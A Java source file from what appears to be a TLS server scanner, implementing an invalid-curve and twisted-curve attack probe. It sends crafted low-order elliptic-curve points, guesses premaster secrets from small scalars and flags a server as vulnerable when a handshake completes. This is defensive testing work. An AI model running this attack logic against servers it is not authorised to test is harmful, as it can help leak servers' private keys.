package de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve;

import de.rub.nds.modifiablevariable.ModifiableVariableFactory;
import de.rub.nds.modifiablevariable.bytearray.ByteArrayModificationFactory;
import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray;
import de.rub.nds.modifiablevariable.util.ArrayConverter;
import de.rub.nds.tlsattacker.core.config.Config;
import de.rub.nds.tlsattacker.core.constants.CipherSuite;
import de.rub.nds.tlsattacker.core.constants.ECPointFormat;
import de.rub.nds.tlsattacker.core.constants.HandshakeMessageType;
import de.rub.nds.tlsattacker.core.constants.NamedGroup;
import de.rub.nds.tlsattacker.core.constants.PskKeyExchangeMode;
import de.rub.nds.tlsattacker.core.crypto.ec.CurveFactory;
import de.rub.nds.tlsattacker.core.crypto.ec.EllipticCurve;
import de.rub.nds.tlsattacker.core.crypto.ec.EllipticCurveOverFp;
import de.rub.nds.tlsattacker.core.crypto.ec.FieldElementFp;
import de.rub.nds.tlsattacker.core.crypto.ec.Point;
import de.rub.nds.tlsattacker.core.crypto.ec.PointFormatter;
import de.rub.nds.tlsattacker.core.crypto.ec.RFC7748Curve;
import de.rub.nds.tlsattacker.core.protocol.message.HandshakeMessage;
import de.rub.nds.tlsattacker.core.state.State;
import de.rub.nds.tlsattacker.core.workflow.ParallelExecutor;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTraceUtil;
import de.rub.nds.tlsattacker.core.workflow.task.TlsTask;
import de.rub.nds.tlsscanner.core.vector.response.FingerprintSecretPair;
import de.rub.nds.tlsscanner.serverscanner.probe.SessionTicketZeroKeyProbe;
import de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve.constants.InvalidCurveScanType;
import de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve.constants.InvalidCurveWorkflowType;
import de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve.point.InvalidCurvePoint;
import de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve.point.TwistedCurvePoint;
import de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve.trace.InvalidCurveWorkflowGenerator;
import de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve.vector.InvalidCurveVector;
import de.rub.nds.tlsscanner.serverscanner.task.InvalidCurveTask;
import java.math.BigInteger;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.bouncycastle.util.BigIntegers;

/**
 * Runs one invalid-curve (or twisted-curve) test for a single {@link InvalidCurveVector}.
 *
 * <p>A fixed public point, taken from {@link InvalidCurvePoint} or {@link TwistedCurvePoint}
 * depending on the vector and scan type, is sent in every protocol flow. For each flow the
 * attacker multiplies that point by a small candidate scalar (flow index + key offset) and uses
 * the resulting x-coordinate as the premaster secret. It then schedules one {@link InvalidCurveTask}
 * per candidate on the {@link ParallelExecutor}. Per-run results are exposed via
 * {@link #getResponsePairs()}, {@link #getReceivedEcPublicKeys()}, {@link #getFinishedKeys()} and
 * {@link #isDirtyKeysWarning()}.
 *
 * <p>NOTE(review): all run state is kept in plain mutable fields without synchronization, and the
 * supplied {@link Config} is modified in place; presumably instances are used from one thread.
 */
public class InvalidCurveAttacker {

    private static final Logger LOGGER = LogManager.getLogger();

    /** Target value of {@code (1 - 2 * infinityProbability)^n} used to size the base flow count. */
    private static final double ERROR_PROBABILITY = 1.0E-4d;

    /** Number of flows scheduled for {@link InvalidCurveScanType#LARGE_GROUP} scans. */
    private static final int LARGE_ORDER_ITERATIONS = 40;

    /** Multiplier applied to the base flow count for EXTENDED and REDUNDANT scans. */
    private static final int EXTENSION_FACTOR = 7;

    private final ParallelExecutor executor;
    private final Config tlsConfig;
    private final InvalidCurveVector vector;
    private final InvalidCurveScanType scanType;
    private final double infinityProbability;

    /** Added to the flow index to form the candidate scalar; the base flow count for EXTENDED, else 0. */
    private int keyOffset;
    /** Number of tasks scheduled by {@link #isVulnerable()}. */
    private int protocolFlows;

    private BigInteger publicPointBaseX;
    private BigInteger publicPointBaseY;
    private ECPointFormat pointCompressionFormat;
    /** Twist factor d (a is scaled by d^2, b by d^3); only set for twist attacks. */
    private BigInteger curveTwistD;
    /** Premaster secret of the task currently being built. */
    private BigInteger premasterSecret;

    private List<FingerprintSecretPair> responsePairs;
    private List<Point> receivedEcPublicKeys;
    private List<Point> finishedKeys;
    private boolean dirtyKeysWarning;

    /**
     * Creates an attacker and prepares {@code config} for the given vector.
     *
     * @param config TLS configuration; modified in place (versions, suites, groups, alert handling)
     * @param parallelExecutor executor that runs the generated tasks
     * @param invalidCurveVector the cipher suite / group / protocol version / attack flavour to test
     * @param invalidCurveScanType selects the public point and the number of flows
     * @param infinityProbability probability value used to size the base flow count; the sizing
     *     formula yields a meaningful positive count only for values strictly between 0 and 0.5
     */
    public InvalidCurveAttacker(
            Config config,
            ParallelExecutor parallelExecutor,
            InvalidCurveVector invalidCurveVector,
            InvalidCurveScanType invalidCurveScanType,
            double infinityProbability) {
        this.tlsConfig = config;
        this.executor = parallelExecutor;
        this.vector = invalidCurveVector;
        this.scanType = invalidCurveScanType;
        this.infinityProbability = infinityProbability;
        setIterationFields();
        setPublicPointFields();
        prepareConfig();
    }

    /**
     * Schedules and executes all protocol flows and evaluates their outcome.
     *
     * <p>Resets the result lists and the dirty-keys flag before running, so repeated calls are
     * independent of each other.
     *
     * @return {@code TRUE} if at least one error-free task ended with a received FINISHED message,
     *     {@code FALSE} if error-free tasks exist but none did, {@code null} if no task completed
     *     without error (including the case where no task was scheduled)
     */
    public Boolean isVulnerable() {
        responsePairs = new LinkedList<>();
        receivedEcPublicKeys = new LinkedList<>();
        finishedKeys = new LinkedList<>();
        dirtyKeysWarning = false;

        EllipticCurve curve;
        Point basePoint;
        if (vector.isTwistAttack()) {
            curve = buildTwistedCurve();
            BigInteger transformedX;
            if (isRfc7748Group()) {
                // Move the Montgomery point to the Weierstrass model before applying the twist.
                RFC7748Curve rfcCurve = getRfc7748Curve();
                Point weierstrassPoint =
                        rfcCurve.toWeierstrass(rfcCurve.getPoint(publicPointBaseX, publicPointBaseY));
                transformedX =
                        weierstrassPoint.getFieldX().getData().multiply(curveTwistD).mod(curve.getModulus());
            } else {
                transformedX = publicPointBaseX.multiply(curveTwistD).mod(curve.getModulus());
            }
            basePoint = Point.createPoint(transformedX, publicPointBaseY, vector.getNamedGroup());
        } else {
            curve = CurveFactory.getCurve(vector.getNamedGroup());
            basePoint = Point.createPoint(publicPointBaseX, publicPointBaseY, vector.getNamedGroup());
        }

        // premasterSecret is only ever set by setPremasterSecret(), so it must not influence how
        // many flows are scheduled (previously a second call collapsed protocolFlows to 1).
        List<TlsTask> tasks = new LinkedList<>();
        for (int i = 1; i <= protocolFlows; i++) {
            int secret = i + keyOffset;
            setPremasterSecret(curve, secret, basePoint);
            tasks.add(new InvalidCurveTask(buildState(), executor.getReexecutions(), secret));
        }
        executor.bulkExecuteTasks(tasks);
        return evaluateExecutedTasks(tasks);
    }

    /** Returns true for the RFC 7748 (Montgomery, x-only) groups X25519 and X448. */
    private boolean isRfc7748Group() {
        NamedGroup group = vector.getNamedGroup();
        return group == NamedGroup.ECDH_X25519 || group == NamedGroup.ECDH_X448;
    }

    /** Returns the vector's curve cast to {@link RFC7748Curve}; only valid if {@link #isRfc7748Group()}. */
    private RFC7748Curve getRfc7748Curve() {
        return (RFC7748Curve) CurveFactory.getCurve(vector.getNamedGroup());
    }

    /**
     * Computes the premaster secret for candidate scalar {@code secret} and stores it in
     * {@link #premasterSecret}.
     *
     * @param curve curve to multiply on (the twisted curve for twist attacks)
     * @param secret candidate scalar
     * @param point point to multiply
     */
    private void setPremasterSecret(EllipticCurve curve, int secret, Point point) {
        BigInteger scalar = BigInteger.valueOf(secret);
        if (isRfc7748Group()) {
            // NOTE(review): presumably the RFC 7748 scalar decoding the peer applies as well.
            scalar = getRfc7748Curve().decodeScalar(scalar);
        }
        Point sharedPoint = curve.mult(scalar, point);
        if (sharedPoint.getFieldX() == null) {
            // A missing x-coordinate is treated as a zero premaster secret.
            premasterSecret = BigInteger.ZERO;
        } else {
            BigInteger modulus = curve.getModulus();
            premasterSecret = sharedPoint.getFieldX().getData();
            if (vector.isTwistAttack()) {
                // Undo the x -> d*x scaling applied when mapping onto the twisted curve.
                premasterSecret = premasterSecret.multiply(curveTwistD.modInverse(modulus)).mod(modulus);
                if (isRfc7748Group()) {
                    RFC7748Curve rfcCurve = getRfc7748Curve();
                    Point weierstrassPoint =
                            rfcCurve.getPoint(premasterSecret, sharedPoint.getFieldY().getData());
                    premasterSecret = rfcCurve.toMontgomery(weierstrassPoint).getFieldX().getData();
                }
            }
            if (isRfc7748Group()) {
                premasterSecret = new BigInteger(1, getRfc7748Curve().encodeCoordinate(premasterSecret));
            }
        }
        LOGGER.debug("PMS for scheduled Workflow Trace with secret {}: {}", secret, premasterSecret);
    }

    /**
     * Builds a fresh {@link State} whose workflow sends the configured public point and forces the
     * current {@link #premasterSecret}.
     */
    private State buildState() {
        EllipticCurve curve = CurveFactory.getCurve(vector.getNamedGroup());
        BigInteger modulus = curve.getModulus();
        Point basePoint =
                new Point(new FieldElementFp(publicPointBaseX, modulus), new FieldElementFp(publicPointBaseY, modulus));

        byte[] serializedBasePoint;
        if (curve instanceof RFC7748Curve) {
            serializedBasePoint = ((RFC7748Curve) curve).encodeCoordinate(basePoint.getFieldX().getData());
        } else {
            serializedBasePoint =
                    PointFormatter.formatToByteArray(vector.getNamedGroup(), basePoint, pointCompressionFormat);
        }
        ModifiableByteArray serializedPublicKey = ModifiableVariableFactory.createByteArrayModifiableVariable();
        serializedPublicKey.setModification(ByteArrayModificationFactory.explicitValue(serializedBasePoint));

        // Left-pad the premaster secret to the byte length of the field modulus.
        int modulusLength = ArrayConverter.bigIntegerToByteArray(modulus).length;
        byte[] pmsBytes = BigIntegers.asUnsignedByteArray(modulusLength, premasterSecret);
        ModifiableByteArray pmsModification = ModifiableVariableFactory.createByteArrayModifiableVariable();
        pmsModification.setModification(ByteArrayModificationFactory.explicitValue(pmsBytes));

        tlsConfig.setWorkflowExecutorShouldClose(false);
        Config configCopy = tlsConfig.createCopy();
        InvalidCurveWorkflowType workflowType = vector.isAttackInRenegotiation()
                ? InvalidCurveWorkflowType.RENEGOTIATION
                : InvalidCurveWorkflowType.REGULAR;
        WorkflowTrace trace = InvalidCurveWorkflowGenerator.generateWorkflow(
                workflowType, serializedPublicKey, pmsModification, pmsBytes, configCopy);
        return new State(configCopy, trace);
    }

    /** Builds the twist of the vector's (Weierstrass-equivalent) curve: a*d^2, b*d^3 mod p. */
    private EllipticCurveOverFp buildTwistedCurve() {
        EllipticCurveOverFp baseCurve = isRfc7748Group()
                ? getRfc7748Curve().getWeierstrassEquivalent()
                : (EllipticCurveOverFp) CurveFactory.getCurve(vector.getNamedGroup());
        BigInteger modulus = baseCurve.getModulus();
        BigInteger twistedA = baseCurve.getFieldA().getData().multiply(curveTwistD.pow(2)).mod(modulus);
        BigInteger twistedB = baseCurve.getFieldB().getData().multiply(curveTwistD.pow(3)).mod(modulus);
        return new EllipticCurveOverFp(twistedA, twistedB, modulus);
    }

    /**
     * Collects fingerprints and received keys from the executed tasks.
     *
     * @param tasks executed tasks; every element is expected to be an {@link InvalidCurveTask}
     * @return see {@link #isVulnerable()}
     */
    private Boolean evaluateExecutedTasks(List<TlsTask> tasks) {
        boolean anyTaskWithoutError = false;
        boolean receivedFinished = false;
        boolean keyFromSuccessfulTask = false;
        boolean keyFromFailedTask = false;
        for (TlsTask task : tasks) {
            InvalidCurveTask invalidCurveTask = (InvalidCurveTask) task;
            Point receivedKey = invalidCurveTask.getReceivedEcKey();
            if (!invalidCurveTask.isHasError()) {
                anyTaskWithoutError = true;
                WorkflowTrace trace = invalidCurveTask.getState().getWorkflowTrace();
                if (isFinishedMessage(WorkflowTraceUtil.getLastReceivedMessage(trace))) {
                    LOGGER.debug(
                            "Received a finished Message using secret: {}! Server is vulnerable!",
                            invalidCurveTask.getAppliedSecret());
                    finishedKeys.add(receivedKey);
                    receivedFinished = true;
                } else {
                    LOGGER.debug("Received no finished Message using secret: {}", invalidCurveTask.getAppliedSecret());
                }
                if (receivedKey != null) {
                    keyFromSuccessfulTask = true;
                    receivedEcPublicKeys.add(receivedKey);
                }
            } else if (receivedKey != null) {
                keyFromFailedTask = true;
                receivedEcPublicKeys.add(receivedKey);
            }
            responsePairs.add(
                    new FingerprintSecretPair(invalidCurveTask.getFingerprint(), invalidCurveTask.getAppliedSecret()));
        }
        // In renegotiation attacks, flag runs where keys were collected from both successful and
        // failed tasks.
        if (vector.isAttackInRenegotiation() && keyFromSuccessfulTask && keyFromFailedTask) {
            dirtyKeysWarning = true;
        }
        if (!anyTaskWithoutError) {
            return null;
        }
        return receivedFinished;
    }

    /** Returns true if {@code message} is a handshake message of type FINISHED (false for null). */
    private static boolean isFinishedMessage(Object message) {
        return message instanceof HandshakeMessage
                && ((HandshakeMessage) message).getHandshakeMessageType() == HandshakeMessageType.FINISHED;
    }

    /** Fingerprint/secret pairs of the last run; {@code null} before {@link #isVulnerable()} ran. */
    public List<FingerprintSecretPair> getResponsePairs() {
        return responsePairs;
    }

    /** Whether the last renegotiation run collected keys from both successful and failed tasks. */
    public boolean isDirtyKeysWarning() {
        return dirtyKeysWarning;
    }

    /** EC keys received in tasks that ended with FINISHED; {@code null} before the first run. */
    public List<Point> getFinishedKeys() {
        return finishedKeys;
    }

    /** All non-null EC keys received during the last run; {@code null} before the first run. */
    public List<Point> getReceivedEcPublicKeys() {
        return receivedEcPublicKeys;
    }

    /**
     * Sets {@link #keyOffset} and {@link #protocolFlows} from the scan type.
     *
     * <p>The base count is the smallest n with {@code (1 - 2 * infinityProbability)^n <=
     * ERROR_PROBABILITY}. For infinityProbability outside (0, 0.5) the floating-point result is
     * degenerate (0 or Integer.MIN_VALUE), which leads to no flows being scheduled.
     */
    private void setIterationFields() {
        if (isRfc7748Group()) {
            protocolFlows = 1;
            return;
        }
        int baseFlows =
                (int) Math.ceil(Math.log(ERROR_PROBABILITY) / Math.log(1.0d - (2.0d * infinityProbability)));
        switch (scanType) {
            case REGULAR:
                keyOffset = 0;
                protocolFlows = baseFlows;
                break;
            case EXTENDED:
                // Continue where a REGULAR scan stopped.
                keyOffset = baseFlows;
                protocolFlows = (baseFlows * EXTENSION_FACTOR) - baseFlows;
                break;
            case REDUNDANT:
                keyOffset = 0;
                protocolFlows = baseFlows * EXTENSION_FACTOR;
                break;
            case LARGE_GROUP:
                keyOffset = 0;
                protocolFlows = LARGE_ORDER_ITERATIONS;
                break;
            default:
                break;
        }
    }

    /** Selects the public point (and twist factor for twist attacks) matching the scan type. */
    private void setPublicPointFields() {
        NamedGroup group = vector.getNamedGroup();
        boolean smallOrder = scanType == InvalidCurveScanType.REGULAR || scanType == InvalidCurveScanType.EXTENDED;
        boolean alternativeOrder = scanType == InvalidCurveScanType.REDUNDANT;
        boolean largeOrder = scanType == InvalidCurveScanType.LARGE_GROUP;
        if (!smallOrder && !alternativeOrder && !largeOrder) {
            return;
        }
        if (vector.isTwistAttack()) {
            TwistedCurvePoint twistedPoint;
            if (smallOrder) {
                twistedPoint = TwistedCurvePoint.smallOrder(group);
            } else if (alternativeOrder) {
                twistedPoint = TwistedCurvePoint.alternativeOrder(group);
            } else {
                twistedPoint = TwistedCurvePoint.largeOrder(group);
            }
            curveTwistD = twistedPoint.getPointD();
            publicPointBaseX = twistedPoint.getPublicPointBaseX();
            publicPointBaseY = twistedPoint.getPublicPointBaseY();
            pointCompressionFormat = vector.getPointFormat();
        } else {
            InvalidCurvePoint invalidPoint;
            if (smallOrder) {
                invalidPoint = InvalidCurvePoint.smallOrder(group);
            } else if (alternativeOrder) {
                invalidPoint = InvalidCurvePoint.alternativeOrder(group);
            } else {
                invalidPoint = InvalidCurvePoint.largeOrder(group);
            }
            publicPointBaseX = invalidPoint.getPublicPointBaseX();
            publicPointBaseY = invalidPoint.getPublicPointBaseY();
            pointCompressionFormat = ECPointFormat.UNCOMPRESSED;
        }
    }

    /** Restricts {@link #tlsConfig} to the vector's version/suite/group and keeps going after alerts. */
    private void prepareConfig() {
        NamedGroup group = vector.getNamedGroup();
        if (vector.getProtocolVersion().isTLS13()) {
            List<NamedGroup> keyShareGroups = new LinkedList<>();
            keyShareGroups.add(group);
            tlsConfig.setDefaultClientKeyShareNamedGroups(keyShareGroups);
            tlsConfig.setAddPSKKeyExchangeModesExtension(true);
            List<PskKeyExchangeMode> pskModes = new LinkedList<>();
            pskModes.add(PskKeyExchangeMode.PSK_DHE_KE);
            tlsConfig.setPSKKeyExchangeModes(pskModes);
        }
        tlsConfig.setHighestProtocolVersion(vector.getProtocolVersion());
        tlsConfig.setDefaultClientSupportedCipherSuites(new CipherSuite[] {vector.getCipherSuite()});
        tlsConfig.setDefaultClientNamedGroups(new NamedGroup[] {group});
        if (!vector.getEcdsaRequiredGroups().isEmpty()) {
            tlsConfig.getDefaultClientNamedGroups().addAll(vector.getEcdsaRequiredGroups());
        }
        tlsConfig.setStopReceivingAfterFatal(false);
        tlsConfig.setStopActionsAfterFatal(false);
        tlsConfig.setStopReceivingAfterWarning(false);
        tlsConfig.setStopActionsAfterWarning(false);
        tlsConfig.setWorkflowExecutorShouldClose(false);
    }
}
